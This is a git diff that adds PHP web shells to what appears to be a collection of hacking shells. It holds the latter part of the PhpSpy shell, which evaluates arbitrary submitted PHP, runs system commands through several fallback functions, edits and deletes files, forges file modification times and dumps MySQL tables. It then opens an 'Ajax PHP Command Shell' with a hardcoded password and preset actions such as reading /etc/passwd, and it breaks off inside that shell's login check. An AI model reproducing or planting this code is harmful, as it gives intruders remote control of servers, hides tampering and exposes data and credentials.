+elseif ($action == 'eval') {
+	$phpcode = trim($phpcode);
+	if($phpcode){
+		if (!preg_match('#<\?#si', $phpcode)) {
+			$phpcode = "<?php\n\n{$phpcode}\n\n?>";
+		}
+		eval("?".">$phpcode<?");
+	}
+	formhead(array('title'=>'Eval PHP Code'));
+	makehide('action','eval');
+	maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode));
+	p('<p><a href="http://www.4ngel.net/phpspy/plugin/" target="_blank">Get plugins</a></p>');
+	formfooter();
+}//end eval
+
+elseif ($action == 'editfile') {
+	if(file_exists($opfile)) {
+		$fp=@fopen($opfile,'r');
+		$contents=@fread($fp, filesize($opfile));
+		@fclose($fp);
+		$contents=htmlspecialchars($contents);
+	}
+	formhead(array('title'=>'Create / Edit File'));
+	makehide('action','file');
+	makehide('dir',$nowpath);
+	makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1));
+	maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents));
+	formfooter();
+}//end editfile
+
+elseif ($action == 'newtime') {
+	$opfilemtime = @filemtime($opfile);
+	//$time = strtotime("$year-$month-$day $hour:$minute:$second");
+	$cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
+	formhead(array('title'=>'Clone file was last modified time'));
+	makehide('action','file');
+	makehide('dir',$nowpath);
+	makeinput(array('title'=>'Alter file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
+	makeinput(array('title'=>'Reference file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1));
+	formfooter();
+	formhead(array('title'=>'Set last modified'));
+	makehide('action','file');
+	makehide('dir',$nowpath);
+	makeinput(array('title'=>'Current file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
+	p('<p>Instead &raquo;');
+	p('year:');
+	makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4));
+	p('month:');
+	makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2));
+	p('day:');
+	makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2));
+	p('hour:');
+	makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2));
+	p('minute:');
+	makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2));
+	p('second:');
+	makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2));
+	p('</p>');
+	formfooter();
+}//end newtime
+
+elseif ($action == 'shell') {
+	if (IS_WIN && IS_COM) {
+		if($program && $parameter) {
+			$shell= new COM('Shell.Application');
+			$a = $shell->ShellExecute($program,$parameter);
+			m('Program run has '.(!$a ? 'success' : 'fail'));
+		}
+		!$program && $program = 'c:\windows\system32\cmd.exe';
+		!$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt';
+		formhead(array('title'=>'Execute Program'));
+		makehide('action','shell');
+		makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1));
+		p('<p>');
+		makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter));
+		makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
+		p('</p>');
+		formfoot();
+	}
+	formhead(array('title'=>'Execute Command'));
+	makehide('action','shell');
+	if (IS_WIN && IS_COM) {
+		$execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open');
+		makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1));
+	}
+	p('<p>');
+	makeinput(array('title'=>'Command','name'=>'command','value'=>$command));
+	makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
+	p('</p>');
+	formfoot();
+
+	if ($command) {
+		p('<hr width="100%" noshade /><pre>');
+		if ($execfunc=='wscript' && IS_WIN && IS_COM) {
+			$wsh = new COM('WScript.shell');
+			$exec = $wsh->exec('cmd.exe /c '.$command);
+			$stdout = $exec->StdOut();
+			$stroutput = $stdout->ReadAll();
+			echo $stroutput;
+		} elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {
+			$descriptorspec = array(
+			   0 => array('pipe', 'r'),
+			   1 => array('pipe', 'w'),
+			   2 => array('pipe', 'w')
+			);
+			$process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
+			if (is_resource($process)) {
+				fwrite($pipes[0], $command."\r\n");
+				fwrite($pipes[0], "exit\r\n");
+				fclose($pipes[0]);
+				while (!feof($pipes[1])) {
+					echo fgets($pipes[1], 1024);
+				}
+				fclose($pipes[1]);
+				while (!feof($pipes[2])) {
+					echo fgets($pipes[2], 1024);
+				}
+				fclose($pipes[2]);
+				proc_close($process);
+			}
+		} else {
+			echo(execute($command));
+		}
+		p('</pre>');
+	}
+}//end shell
+
+elseif ($action == 'phpenv') {
+	$upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
+	$adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
+	!$dis_func && $dis_func = 'No';	
+	$info = array(
+		1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)),
+		2 => array('Server Domain',$_SERVER['SERVER_NAME']),
+		3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])),
+		4 => array('Server OS',PHP_OS),
+		5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']),
+		6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']),
+		7 => array('Server Web Port',$_SERVER['SERVER_PORT']),
+		8 => array('PHP run mode',strtoupper(php_sapi_name())),
+		9 => array('The file path',__FILE__),
+
+		10 => array('PHP Version',PHP_VERSION),
+		11 => array('PHPINFO',(IS_PHPINFO ? '<a href="javascript:goaction(\'phpinfo\');">Yes</a>' : 'No')),
+		12 => array('Safe Mode',getcfg('safe_mode')),
+		13 => array('Administrator',$adminmail),
+		14 => array('allow_url_fopen',getcfg('allow_url_fopen')),
+		15 => array('enable_dl',getcfg('enable_dl')),
+		16 => array('display_errors',getcfg('display_errors')),
+		17 => array('register_globals',getcfg('register_globals')),
+		18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')),
+		19 => array('memory_limit',getcfg('memory_limit')),
+		20 => array('post_max_size',getcfg('post_max_size')),
+		21 => array('upload_max_filesize',$upsize),
+		22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'),
+		23 => array('disable_functions',$dis_func),
+	);
+
+	if($phpvarname) {
+		m($phpvarname .' : '.getcfg($phpvarname));
+	}
+
+	formhead(array('title'=>'Server environment'));
+	makehide('action','phpenv');
+	makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1));
+	formfooter();
+
+	$hp = array(0=> 'Server', 1=> 'PHP');
+	for($a=0;$a<2;$a++) {
+		p('<h2>'.$hp[$a].' &raquo;</h2>');
+		p('<ul class="info">');
+		if ($a==0) {
+			for($i=1;$i<=9;$i++) {
+				p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
+			}
+		} elseif ($a == 1) {
+			for($i=10;$i<=23;$i++) {
+				p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
+			}
+		}
+		p('</ul>');
+	}
+}//end phpenv
+
+else {
+	m('Undefined Action');
+}
+
+?>
+</td></tr></table>
+<div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;">
+	<span style="float:right;"><?php debuginfo();ob_end_flush();?></span>
+	Copyright (C) 2004-2008 <a href="http://www.4ngel.net" target="_blank">Security Angel Team [S4T]</a> All Rights Reserved.
+</div>
+</body>
+</html>
+
+<?php
+
+/*======================================================
+������
+======================================================*/
+
+function m($msg) {
+	echo '<div style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;">';
+	echo $msg;
+	echo '</div>';
+}
+function scookie($key, $value, $life = 0, $prefix = 1) {
+	global $admin, $timestamp, $_SERVER;
+	$key = ($prefix ? $admin['cookiepre'] : '').$key;
+	$life = $life ? $life : $admin['cookielife'];
+	$useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
+	setcookie($key, $value, $timestamp+$life, $admin['cookiepath'], $admin['cookiedomain'], $useport);
+}	
+function multi($num, $perpage, $curpage, $tablename) {
+	$multipage = '';
+	if($num > $perpage) {
+		$page = 10;
+		$offset = 5;
+		$pages = @ceil($num / $perpage);
+		if($page > $pages) {
+			$from = 1;
+			$to = $pages;
+		} else {
+			$from = $curpage - $offset;
+			$to = $curpage + $page - $offset - 1;
+			if($from < 1) {
+				$to = $curpage + 1 - $from;
+				$from = 1;
+				if(($to - $from) < $page && ($to - $from) < $pages) {
+					$to = $page;
+				}
+			} elseif($to > $pages) {
+				$from = $curpage - $pages + $to;
+				$to = $pages;
+				if(($to - $from) < $page && ($to - $from) < $pages) {
+					$from = $pages - $page + 1;
+				}
+			}
+		}
+		$multipage = ($curpage - $offset > 1 && $pages > $page ? '<a href="javascript:settable(\''.$tablename.'\', \'\', 1);">First</a> ' : '').($curpage > 1 ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage - 1).');">Prev</a> ' : '');
+		for($i = $from; $i <= $to; $i++) {
+			$multipage .= $i == $curpage ? $i.' ' : '<a href="javascript:settable(\''.$tablename.'\', \'\', '.$i.');">['.$i.']</a> ';
+		}
+		$multipage .= ($curpage < $pages ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage + 1).');">Next</a>' : '').($to < $pages ? ' <a href="javascript:settable(\''.$tablename.'\', \'\', '.$pages.');">Last</a>' : '');
+		$multipage = $multipage ? '<p>Pages: '.$multipage.'</p>' : '';
+	}
+	return $multipage;
+}
+// ��½���
+function loginpage() {
+?>
+	<style type="text/css">
+	input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}
+	</style>
+	<form method="POST" action="">
+	<span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">
+	<input type="hidden" name="doing" value="login">
+	<input type="submit" value="Login">
+	</form>
+<?php
+	exit;
+}//end loginpage()
+
+function execute($cfe) {
+	$res = '';
+	if ($cfe) {
+		if(function_exists('exec')) {
+			@exec($cfe,$res);
+			$res = join("\n",$res);
+		} elseif(function_exists('shell_exec')) {
+			$res = @shell_exec($cfe);
+		} elseif(function_exists('system')) {
+			@ob_start();
+			@system($cfe);
+			$res = @ob_get_contents();
+			@ob_end_clean();
+		} elseif(function_exists('passthru')) {
+			@ob_start();
+			@passthru($cfe);
+			$res = @ob_get_contents();
+			@ob_end_clean();
+		} elseif(@is_resource($f = @popen($cfe,"r"))) {
+			$res = '';
+			while(!@feof($f)) {
+				$res .= @fread($f,1024); 
+			}
+			@pclose($f);
+		}
+	}
+	return $res;
+}
+function which($pr) {
+	$path = execute("which $pr");
+	return ($path ? $path : $pr); 
+}
+
+function cf($fname,$text){
+	if($fp=@fopen($fname,'w')) {
+		@fputs($fp,@base64_decode($text));
+		@fclose($fp);
+	}
+}
+
+// ҳ�������Ϣ
+function debuginfo() {
+	global $starttime;
+	$mtime = explode(' ', microtime());
+	$totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
+	echo 'Processed in '.$totaltime.' second(s)';
+}
+
+//�������ݿ�
+function dbconn($dbhost,$dbuser,$dbpass,$dbname='',$charset='',$dbport='3306') {
+	if(!$link = @mysql_connect($dbhost.':'.$dbport, $dbuser, $dbpass)) {
+		p('<h2>Can not connect to MySQL server</h2>');
+		exit;
+	}
+	if($link && $dbname) {
+		if (!@mysql_select_db($dbname, $link)) {
+			p('<h2>Database selected has error</h2>');
+			exit;
+		}
+	}
+	if($link && mysql_get_server_info() > '4.1') {
+		if(in_array(strtolower($charset), array('gbk', 'big5', 'utf8'))) {
+			q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link);
+		}
+	}
+	return $link;
+}
+
+// ȥ��ת���ַ�
+function s_array(&$array) {
+	if (is_array($array)) {
+		foreach ($array as $k => $v) {
+			$array[$k] = s_array($v);
+		}
+	} else if (is_string($array)) {
+		$array = stripslashes($array);
+	}
+	return $array;
+}
+
+// ���HTML����
+function html_clean($content) {
+	$content = htmlspecialchars($content);
+	$content = str_replace("\n", "<br />", $content);
+	$content = str_replace("  ", "&nbsp;&nbsp;", $content);
+	$content = str_replace("\t", "&nbsp;&nbsp;&nbsp;&nbsp;", $content);
+	return $content;
+}
+
+// ��ȡȨ��
+function getChmod($filepath){
+	return substr(base_convert(@fileperms($filepath),10,8),-4);
+}
+
+function getPerms($filepath) {
+	$mode = @fileperms($filepath);
+	if (($mode & 0xC000) === 0xC000) {$type = 's';}
+	elseif (($mode & 0x4000) === 0x4000) {$type = 'd';}
+	elseif (($mode & 0xA000) === 0xA000) {$type = 'l';}
+	elseif (($mode & 0x8000) === 0x8000) {$type = '-';} 
+	elseif (($mode & 0x6000) === 0x6000) {$type = 'b';}
+	elseif (($mode & 0x2000) === 0x2000) {$type = 'c';}
+	elseif (($mode & 0x1000) === 0x1000) {$type = 'p';}
+	else {$type = '?';}
+
+	$owner['read'] = ($mode & 00400) ? 'r' : '-'; 
+	$owner['write'] = ($mode & 00200) ? 'w' : '-'; 
+	$owner['execute'] = ($mode & 00100) ? 'x' : '-'; 
+	$group['read'] = ($mode & 00040) ? 'r' : '-'; 
+	$group['write'] = ($mode & 00020) ? 'w' : '-'; 
+	$group['execute'] = ($mode & 00010) ? 'x' : '-'; 
+	$world['read'] = ($mode & 00004) ? 'r' : '-'; 
+	$world['write'] = ($mode & 00002) ? 'w' : '-'; 
+	$world['execute'] = ($mode & 00001) ? 'x' : '-'; 
+
+	if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';}
+	if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';}
+	if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';}
+ 
+	return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute'];
+}
+
+function getUser($filepath)	{
+	if (function_exists('posix_getpwuid')) {
+		$array = @posix_getpwuid(@fileowner($filepath));
+		if ($array && is_array($array)) {
+			return ' / <a href="#" title="User: '.$array['name'].'&#13&#10Passwd: '.$array['passwd'].'&#13&#10Uid: '.$array['uid'].'&#13&#10gid: '.$array['gid'].'&#13&#10Gecos: '.$array['gecos'].'&#13&#10Dir: '.$array['dir'].'&#13&#10Shell: '.$array['shell'].'">'.$array['name'].'</a>';
+		}
+	}
+	return '';
+}
+
+// ɾ��Ŀ¼
+function deltree($deldir) {
+	$mydir=@dir($deldir);	
+	while($file=$mydir->read())	{ 		
+		if((is_dir($deldir.'/'.$file)) && ($file!='.') && ($file!='..')) { 
+			@chmod($deldir.'/'.$file,0777);
+			deltree($deldir.'/'.$file); 
+		}
+		if (is_file($deldir.'/'.$file)) {
+			@chmod($deldir.'/'.$file,0777);
+			@unlink($deldir.'/'.$file);
+		}
+	} 
+	$mydir->close(); 
+	@chmod($deldir,0777);
+	return @rmdir($deldir) ? 1 : 0;
+}
+
+// �����м�ı���ɫ�滻
+function bg() {
+	global $bgc;
+	return ($bgc++%2==0) ? 'alt1' : 'alt2';
+}
+
+// ��ȡ��ǰ���ļ�ϵͳ·��
+function getPath($scriptpath, $nowpath) {
+	if ($nowpath == '.') {
+		$nowpath = $scriptpath;
+	}
+	$nowpath = str_replace('\\', '/', $nowpath);
+	$nowpath = str_replace('//', '/', $nowpath);
+	if (substr($nowpath, -1) != '/') {
+		$nowpath = $nowpath.'/';
+	}
+	return $nowpath;
+}
+
+// ��ȡ��ǰĿ¼���ϼ�Ŀ¼
+function getUpPath($nowpath) {
+	$pathdb = explode('/', $nowpath);
+	$num = count($pathdb);
+	if ($num > 2) {
+		unset($pathdb[$num-1],$pathdb[$num-2]);
+	}
+	$uppath = implode('/', $pathdb).'/';
+	$uppath = str_replace('//', '/', $uppath);
+	return $uppath;
+}
+
+// ���PHP���ò���
+function getcfg($varname) {
+	$result = get_cfg_var($varname);
+	if ($result == 0) {
+		return 'No';
+	} elseif ($result == 1) {
+		return 'Yes';
+	} else {
+		return $result;
+	}
+}
+
+// ��麯�����
+function getfun($funName) {
+	return (false !== function_exists($funName)) ? 'Yes' : 'No';
+}
+
+function GetList($dir){
+	global $dirdata,$j,$nowpath;
+	!$j && $j=1;
+	if ($dh = opendir($dir)) {
+		while ($file = readdir($dh)) {
+			$f=str_replace('//','/',$dir.'/'.$file);
+			if($file!='.' && $file!='..' && is_dir($f)){
+				if (is_writable($f)) {
+					$dirdata[$j]['filename']=str_replace($nowpath,'',$f);
+					$dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
+					$dirdata[$j]['dirchmod']=getChmod($f);
+					$dirdata[$j]['dirperm']=getPerms($f);
+					$dirdata[$j]['dirlink']=ue($dir);
+					$dirdata[$j]['server_link']=$f;
+					$dirdata[$j]['client_link']=ue($f);
+					$j++;
+				}
+				GetList($f);
+			}
+		}
+		closedir($dh);
+		clearstatcache();
+		return $dirdata;
+	} else {
+		return array();
+	}
+}
+
+function qy($sql) { 
+	//echo $sql.'<br>';
+	$res = $error = '';
+	if(!$res = @mysql_query($sql)) { 
+		return 0;
+	} else if(is_resource($res)) {
+		return 1; 
+	} else {
+		return 2;
+	}	
+	return 0;
+}
+
+function q($sql) { 
+	return @mysql_query($sql);
+}
+
+function fr($qy){
+	mysql_free_result($qy);
+}
+
+function sizecount($size) {
+	if($size > 1073741824) {
+		$size = round($size / 1073741824 * 100) / 100 . ' G';
+	} elseif($size > 1048576) {
+		$size = round($size / 1048576 * 100) / 100 . ' M';
+	} elseif($size > 1024) {
+		$size = round($size / 1024 * 100) / 100 . ' K';
+	} else {
+		$size = $size . ' B';
+	}
+	return $size;
+}
+
+// ѹ�������
+class PHPZip{
+	var $out='';
+	function PHPZip($dir)	{
+		if (@function_exists('gzcompress'))	{
+			$curdir = getcwd();
+			if (is_array($dir)) $filelist = $dir;
+			else{
+				$filelist=$this -> GetFileList($dir);//�ļ��б�
+				foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1);
+			}
+			if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir);
+			else chdir($curdir);
+			if (count($filelist)>0){
+				foreach($filelist as $filename){
+					if (is_file($filename)){
+						$fd = fopen ($filename, 'r');
+						$content = @fread ($fd, filesize($filename));
+						fclose ($fd);
+						if (is_array($dir)) $filename = basename($filename);
+						$this -> addFile($content, $filename);
+					}
+				}
+				$this->out = $this -> file();
+				chdir($curdir);
+			}
+			return 1;
+		}
+		else return 0;
+	}
+
+	// ���ָ��Ŀ¼�ļ��б�
+	function GetFileList($dir){
+		static $a;
+		if (is_dir($dir)) {
+			if ($dh = opendir($dir)) {
+				while ($file = readdir($dh)) {
+					if($file!='.' && $file!='..'){
+						$f=$dir .'/'. $file;
+						if(is_dir($f)) $this->GetFileList($f);
+						$a[]=$f;
+					}
+				}
+				closedir($dh);
+			}
+		}
+		return $a;
+	}
+
+	var $datasec      = array();
+	var $ctrl_dir     = array();
+	var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
+	var $old_offset   = 0;
+
+	function unix2DosTime($unixtime = 0) {
+		$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
+		if ($timearray['year'] < 1980) {
+			$timearray['year']    = 1980;
+			$timearray['mon']     = 1;
+			$timearray['mday']    = 1;
+			$timearray['hours']   = 0;
+			$timearray['minutes'] = 0;
+			$timearray['seconds'] = 0;
+		} // end if
+		return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
+				($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
+	}
+
+	function addFile($data, $name, $time = 0) {
+		$name = str_replace('\\', '/', $name);
+
+		$dtime = dechex($this->unix2DosTime($time));
+		$hexdtime	= '\x' . $dtime[6] . $dtime[7]
+					. '\x' . $dtime[4] . $dtime[5]
+					. '\x' . $dtime[2] . $dtime[3]
+					. '\x' . $dtime[0] . $dtime[1];
+		eval('$hexdtime = "' . $hexdtime . '";');
+		$fr	= "\x50\x4b\x03\x04";
+		$fr	.= "\x14\x00";
+		$fr	.= "\x00\x00";
+		$fr	.= "\x08\x00";
+		$fr	.= $hexdtime;
+
+		$unc_len = strlen($data);
+		$crc = crc32($data);
+		$zdata = gzcompress($data);
+		$c_len = strlen($zdata);
+		$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
+		$fr .= pack('V', $crc);
+		$fr .= pack('V', $c_len);
+		$fr .= pack('V', $unc_len);
+		$fr .= pack('v', strlen($name));
+		$fr .= pack('v', 0);
+		$fr .= $name;
+		$fr .= $zdata;
+		$fr .= pack('V', $crc);
+		$fr .= pack('V', $c_len);
+		$fr .= pack('V', $unc_len);
+
+		$this -> datasec[] = $fr;
+		$new_offset = strlen(implode('', $this->datasec));
+
+		$cdrec = "\x50\x4b\x01\x02";
+		$cdrec .= "\x00\x00";
+		$cdrec .= "\x14\x00";
+		$cdrec .= "\x00\x00";
+		$cdrec .= "\x08\x00";
+		$cdrec .= $hexdtime;
+		$cdrec .= pack('V', $crc);
+		$cdrec .= pack('V', $c_len);
+		$cdrec .= pack('V', $unc_len);
+		$cdrec .= pack('v', strlen($name) );
+		$cdrec .= pack('v', 0 );
+		$cdrec .= pack('v', 0 );
+		$cdrec .= pack('v', 0 );
+		$cdrec .= pack('v', 0 );
+		$cdrec .= pack('V', 32 );
+		$cdrec .= pack('V', $this -> old_offset );
+		$this -> old_offset = $new_offset;
+		$cdrec .= $name;
+
+		$this -> ctrl_dir[] = $cdrec;
+	}
+
+	function file() {
+		$data    = implode('', $this -> datasec);
+		$ctrldir = implode('', $this -> ctrl_dir);
+		return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) .	pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";
+	}
+}
+
+// �������ݿ�
+function sqldumptable($table, $fp=0) {
+	$tabledump = "DROP TABLE IF EXISTS $table;\n";
+	$tabledump .= "CREATE TABLE $table (\n";
+
+	$firstfield=1;
+
+	$fields = q("SHOW FIELDS FROM $table");
+	while ($field = mysql_fetch_array($fields)) {
+		if (!$firstfield) {
+			$tabledump .= ",\n";
+		} else {
+			$firstfield=0;
+		}
+		$tabledump .= "   $field[Field] $field[Type]";
+		if (!empty($field["Default"])) {
+			$tabledump .= " DEFAULT '$field[Default]'";
+		}
+		if ($field['Null'] != "YES") {
+			$tabledump .= " NOT NULL";
+		}
+		if ($field['Extra'] != "") {
+			$tabledump .= " $field[Extra]";
+		}
+	}
+	fr($fields);
+
+	$keys = q("SHOW KEYS FROM $table");
+	while ($key = mysql_fetch_array($keys)) {
+		$kname=$key['Key_name'];
+		if ($kname != "PRIMARY" && $key['Non_unique'] == 0) {
+			$kname="UNIQUE|$kname";
+		}
+		if(!is_array($index[$kname])) {
+			$index[$kname] = array();
+		}
+		$index[$kname][] = $key['Column_name'];
+	}
+	fr($keys);
+
+	while(list($kname, $columns) = @each($index)) {
+		$tabledump .= ",\n";
+		$colnames=implode($columns,",");
+
+		if ($kname == "PRIMARY") {
+			$tabledump .= "   PRIMARY KEY ($colnames)";
+		} else {
+			if (substr($kname,0,6) == "UNIQUE") {
+				$kname=substr($kname,7);
+			}
+			$tabledump .= "   KEY $kname ($colnames)";
+		}
+	}
+
+	$tabledump .= "\n);\n\n";
+	if ($fp) {
+		fwrite($fp,$tabledump);
+	} else {
+		echo $tabledump;
+	}
+
+	$rows = q("SELECT * FROM $table");
+	$numfields = mysql_num_fields($rows);
+	while ($row = mysql_fetch_array($rows)) {
+		$tabledump = "INSERT INTO $table VALUES(";
+
+		$fieldcounter=-1;
+		$firstfield=1;
+		while (++$fieldcounter<$numfields) {
+			if (!$firstfield) {
+				$tabledump.=", ";
+			} else {
+				$firstfield=0;
+			}
+
+			if (!isset($row[$fieldcounter])) {
+				$tabledump .= "NULL";
+			} else {
+				$tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'";
+			}
+		}
+
+		$tabledump .= ");\n";
+
+		if ($fp) {
+			fwrite($fp,$tabledump);
+		} else {
+			echo $tabledump;
+		}
+	}
+	fr($rows);
+	if ($fp) {
+		fwrite($fp,"\n");
+	} else {
+		echo "\n";
+	}
+}
+
+function ue($str){
+	return urlencode($str);
+}
+
+function p($str){
+	echo $str."\n";
+}
+
+function tbhead() {
+	p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
+}
+function tbfoot(){
+	p('</table>');
+}
+
+function makehide($name,$value=''){
+	p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
+}
+
+function makeinput($arg = array()){
+	$arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
+	$arg['extra'] = $arg['extra'] ? $arg['extra'] : '';
+	!$arg['type'] && $arg['type'] = 'text';
+	$arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
+	$arg['class'] = $arg['class'] ? $arg['class'] : 'input';
+	if ($arg['newline']) {
+		p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>");
+	} else {
+		p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />");
+	}
+}
+
+function makeselect($arg = array()){
+	if ($arg['onchange']) {
+		$onchange = 'onchange="'.$arg['onchange'].'"';
+	}
+	$arg['title'] = $arg['title'] ? $arg['title'] : '';
+	if ($arg['newline']) p('<p>');
+	p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
+		if (is_array($arg['option'])) {
+			foreach ($arg['option'] as $key=>$value) {
+				if ($arg['selected']==$key) {
+					p("<option value=\"$key\" selected>$value</option>");
+				} else {
+					p("<option value=\"$key\">$value</option>");
+				}
+			}
+		}
+	p("</select>");
+	if ($arg['newline']) p('</p>');
+}
+function formhead($arg = array()) {
+	!$arg['method'] && $arg['method'] = 'post';
+	!$arg['action'] && $arg['action'] = $self;
+	$arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : '';
+	!$arg['name'] && $arg['name'] = 'form1';
+	p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");
+	if ($arg['title']) {
+		p('<h2>'.$arg['title'].' &raquo;</h2>');
+	}
+}
+	
+function maketext($arg = array()){
+	!$arg['cols'] && $arg['cols'] = 100;
+	!$arg['rows'] && $arg['rows'] = 25;
+	$arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
+	p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>");
+}
+
+function formfooter($name = ''){
+	!$name && $name = 'submit';
+	p('<p><input class="bt" name="'.$name.'" id=\"'.$name.'\" type="submit" value="Submit"></p>');
+	p('</form>');
+}
+
+function formfoot(){
+	p('</form>');
+}
+
+// ���Ժ���
+function pr($a) {
+	echo '<pre>';
+	print_r($a);
+	echo '</pre>';
+}
+
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/Ajax_PHP Command Shell.php.txt b/xakep-shells/PHP/Ajax_PHP Command Shell.php.txt
new file mode 100644
index 0000000..d08768a
--- /dev/null
+++ b/xakep-shells/PHP/Ajax_PHP Command Shell.php.txt	
@@ -0,0 +1,646 @@
+<?php
+session_start();
+
+error_reporting(0);
+
+$password = "password";		 //Change this to your password ;)
+
+$version = "0.7B";
+
+$functions = array('Clear Screen' => 'ClearScreen()',
+'Clear History' => 'ClearHistory()',
+'Can I function?' => "runcommand('canirun','GET')",
+'Get server info' => "runcommand('showinfo','GET')",
+'Read /etc/passwd' => "runcommand('etcpasswdfile','GET')",
+'Open ports' => "runcommand('netstat -an | grep -i listen','GET')",
+'Running processes' => "runcommand('ps -aux','GET')",
+'Readme' => "runcommand('shellhelp','GET')"
+
+);
+$thisfile = basename(__FILE__);
+
+$style = '<style type="text/css">
+.cmdthing {
+    border-top-width: 0px;
+    font-weight: bold;
+    border-left-width: 0px;
+    font-size: 10px;
+    border-left-color: #000000;
+    background: #000000;
+    border-bottom-width: 0px;
+    border-bottom-color: #FFFFFF;
+    color: #FFFFFF;
+    border-top-color: #008000;
+    font-family: verdana;
+    border-right-width: 0px;
+    border-right-color: #000000;
+}
+input,textarea {
+    border-top-width: 1px;
+    font-weight: bold;
+    border-left-width: 1px;
+    font-size: 10px;
+    border-left-color: #FFFFFF;
+    background: #000000;
+    border-bottom-width: 1px;
+    border-bottom-color: #FFFFFF;
+    color: #FFFFFF;
+    border-top-color: #FFFFFF;
+    font-family: verdana;
+    border-right-width: 1px;
+    border-right-color: #FFFFFF;
+}
+A:hover {
+text-decoration: none;
+}
+
+
+table,td,div {
+border-collapse: collapse;
+border: 1px solid #FFFFFF;
+}
+body {
+color: #FFFFFF;
+font-family: verdana;
+}
+</style>';
+$sess = __FILE__.$password;
+if(isset($_POST['p4ssw0rD']))
+{
+	if($_POST['p4ssw0rD'] == $password)
+	{
+		$_SESSION[$sess] = $_POST['p4ssw0rD'];
+	}
+	else
+	{
